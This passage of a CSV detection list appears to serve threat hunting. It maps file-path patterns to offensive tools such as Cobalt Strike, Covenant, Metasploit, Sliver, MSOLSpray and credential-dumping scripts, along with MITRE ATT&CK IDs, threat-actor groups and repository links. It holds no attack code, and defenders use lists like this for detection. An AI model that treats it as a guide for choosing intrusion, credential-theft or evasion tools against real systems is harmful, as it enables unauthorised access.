with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/minidump.go*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","1","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" +"*/minimal_elf.h*","offensive_tool_keyword","cobaltstrike","This is a ELF object in memory loader/runner. The goal is to create a single elf loader that can be used to run follow on capabilities across all x86_64 and x86 nix operating systems.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - 
menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/trustedsec/ELFLoader","1","1","N/A","10","10","204","40","2022-05-16T17:48:40Z","2022-04-26T19:18:20Z" +"*/mirai_pass.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/Misc/donut.exe*","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - 
T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/GhostPack/Koh","1","1","N/A","10","10","447","59","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z" +"*/mitmAP*","offensive_tool_keyword","mitmAP","A python program to create a fake AP and sniff data","T1563 - T1593 - T1594 - T1567","TA0002 - TA0007 - TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/xdavidhu/mitmAP","1","1","N/A","N/A","10","1620","282","2019-11-03T11:34:06Z","2016-10-22T21:49:25Z" +"*/mmouse-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mmouse-exec.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Mockingjay_BOF.git*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object File (BOF) Conversion of the Mockingjay Process Injection Technique","T1055.012 - T1059.001 - T1027.002","TA0002 - TA0005","N/A","N/A","C2","https://github.com/ewby/Mockingjay_BOF","1","1","N/A","9","10","32","7","2023-08-27T14:09:39Z","2023-08-27T06:01:28Z" +"*/modbus-discover.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Models/PowerShellLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/Regsvr32Launcher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - 
TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Models/ShellCodeLauncher.*","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","1","N/A","10","10","3790","733","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" +"*/Modlishka.git*","offensive_tool_keyword","Modlishka ","Modlishka is a powerful and flexible HTTP reverse proxy. It implements an entirely new and interesting approach of handling browser-based HTTP traffic flow. which allows to transparently proxy multi-domain destination traffic. both TLS and non-TLS. over a single domain. without a requirement of installing any additional certificate on the client.","T1090.001 - T1071.001 - T1556.001 - T1204.001 - T1568.002","TA0011 - TA0001 - TA0002 - TA0005 - TA0040","N/A","N/A","Network Exploitation Tools","https://github.com/drk1wi/Modlishka","1","1","N/A","5","10","4435","854","2023-04-10T07:30:13Z","2018-12-19T15:59:54Z" +"*/module/darkexe/*","offensive_tool_keyword","FourEye","AV Evasion Tool","T1059 - T1059.001 - T1059.005 - T1027 - T1027.005","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/lengjibo/FourEye","1","0","N/A","10","8","724","154","2021-12-08T11:55:15Z","2020-12-11T01:29:58Z" +"*/Modules/Exitservice/uinit.exe*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. 
etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*/modules/payload/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/mongodb-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mongodb-databases.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mongodb-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/monkey.py","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/monkey_island.py*","offensive_tool_keyword","monkey","Infection Monkey - An automated pentest tool","T1587 T1570 T1021 T1072 T1550","N/A","N/A","N/A","Exploitation tools","https://github.com/guardicore/monkey","1","1","N/A","N/A","10","6332","762","2023-10-04T21:10:48Z","2015-08-30T07:22:51Z" +"*/MonkeyWorks.git*","offensive_tool_keyword","Tokenvator","A tool to elevate privilege with Windows Tokens","T1134 - T1078","TA0003 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/0xbadjuju/Tokenvator","1","1","N/A","N/A","10","968","208","2023-02-21T18:07:02Z","2017-12-08T01:29:11Z" +"*/mouselogger.py*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z" +"*/mqtt-subscribe.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mRemoteNG-Decrypt*","offensive_tool_keyword","mRemoteNG-Decrypt","Python script to decrypt passwords stored by mRemoteNG","T1589 T1003 T1563 T1552 T1098 T1021","N/A","N/A","N/A","Credential Access","https://github.com/haseebT/mRemoteNG-Decrypt","1","1","N/A","N/A","2","111","39","2023-07-06T16:15:20Z","2019-05-27T05:25:57Z" +"*/mrinfo.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/Mr-Un1k0d3r/*","offensive_tool_keyword","cobaltstrike","Fileless lateral movement tool that relies on ChangeServiceConfigA to run command","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Mr-Un1k0d3r/SCShell","1","1","N/A","10","10","1241","228","2023-07-10T01:31:54Z","2019-11-13T23:39:27Z" +"*/Mr-xn/cve-2022-23131*","offensive_tool_keyword","POC","POC exploitaiton of zabbix saml bypass exp vulnerability cve-2022-23131 (Unsafe client-side session storage leading to authentication bypass/instance takeover via Zabbix Frontend with configured SAML)","T1548 - T1190","TA0001 - TA0002","N/A","N/A","Exploitation 
tools","https://github.com/Mr-xn/cve-2022-23131","1","1","N/A","N/A","2","146","48","2022-02-24T15:02:12Z","2022-02-18T11:51:47Z" +"*/MS15-034.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://github.com/cldrn/nmap-nse-scripts/tree/master/scripts","1","1","N/A","N/A","10","920","383","2022-01-22T18:40:30Z","2011-05-31T05:41:49Z" +"*/ms17-010.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/msf.go","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003 - TA0006 - TA0009","N/A","N/A","C2","https://github.com/BishopFox/sliver","1","1","N/A","10","10","6609","921","2023-10-04T21:02:15Z","2019-01-17T22:07:38Z" +"*/msf.swf*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. 
and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfcrawler*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfpc.sh*","offensive_tool_keyword","msfpc","Msfvenom is the combination of payload generation and encoding. 
It replaced msfpayload and msfencode on June 8th 2015.","T1027 - T1036 - T1564 - T1071 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/g0tmi1k/msfpc","1","1","N/A","N/A","10","1129","275","2021-05-09T13:16:07Z","2015-06-22T12:58:04Z" +"*/msftest/*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msfvenom/*","offensive_tool_keyword","msfvenom","Msfvenom is the combination of payload generation and encoding. It replaced msfpayload and msfencode on June 8th 2015.","T1059.001 - T1027 - T1210.001 - T1204.002","TA0002 - TA0003 - TA0004","N/A","N/A","POST Exploitation tools","https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/msf-ws.log*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. 
It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*/MsgKitTestTool/*","offensive_tool_keyword","poc","Exploit for the CVE-2023-23397","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/sqrtZeroKnowledge/CVE-2023-23397_EXPLOIT_0DAY","1","1","N/A","N/A","2","158","46","2023-03-15T17:53:53Z","2023-03-15T17:03:38Z" +"*/Mshikaki.git*","offensive_tool_keyword","Mshikaki","A shellcode injection tool capable of bypassing AMSI. Features the QueueUserAPC() injection technique and supports XOR encryption","T1055.012 - T1116 - T1027.002 - T1562.001","TA0005 - TA0006 - TA0040 - TA0002","N/A","N/A","Exploitation tools","https://github.com/trevorsaudi/Mshikaki","1","1","N/A","9","2","103","21","2023-09-29T19:23:40Z","2023-09-03T16:35:50Z" +"*/mshta.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/mshtajs.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*/msi_search.ps1*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*/msi-search.git*","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to 
download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","2","158","15","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" +"*/msLDAPDump*","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","205","27","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" +"*/msol.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/MSOLSpray*","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","8","735","147","2023-02-17T13:52:21Z","2020-03-16T13:38:22Z" +"*/msrpc-enum.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/mssql_priv.py*","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","6","596","57","2023-10-04T00:55:43Z","2023-09-08T15:36:00Z" +"*/ms-sql-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-config.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*/ms-sql-dac.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
+"*/ms-sql-dump-hashes.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
